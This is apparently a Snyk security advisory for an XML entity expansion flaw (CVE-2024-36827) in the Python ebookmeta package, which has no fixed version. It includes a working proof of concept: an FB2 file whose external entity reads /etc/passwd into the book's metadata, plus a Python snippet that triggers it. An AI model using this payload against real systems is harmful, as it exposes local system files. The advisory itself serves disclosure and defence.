Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') Affecting ebookmeta package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (39th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-EBOOKMETA-7222571
- published 9 Jun 2024
- disclosed 7 Jun 2024
- credit peri0d
Introduced: 7 Jun 2024
CVE-2024-36827 Open this link in a new tabHow to fix?
There is no fixed version for ebookmeta.
Overview
ebookmeta is a Read/write ebook metadata for fb2, epub2 and epub3 files
Affected versions of this package are vulnerable to Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') via the get_metadata function. An attacker can access sensitive information or disrupt service by supplying specially crafted XML input.
PoC
Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
<description>
<title-info>
<genre>antique</genre>
<author><first-name></first-name><last-name>&xxe;</last-name></author>
<book-title>&xxe;</book-title>
<lang>&xxe;</lang>
</title-info>
<document-info>
<author><first-name></first-name><last-name>Unknown</last-name></author>
<program-used>calibre 6.13.0</program-used>
<date>26.5.2024</date>
<id>eb5cbf82-22b5-4331-8009-551a95342ea0</id>
<version>1.0</version>
</document-info>
<publish-info>
</publish-info>
</description>
<body>
<section>
<p><root></p>
<p>12345</p>
<p></root></p>
</section>
</body>
</FictionBook>
Exploitation:
import ebookmeta
fp = "payload.fb2"
meta = ebookmeta.get_metadata(fp)
print(meta.title)
References
CVSS Scores
version 3.1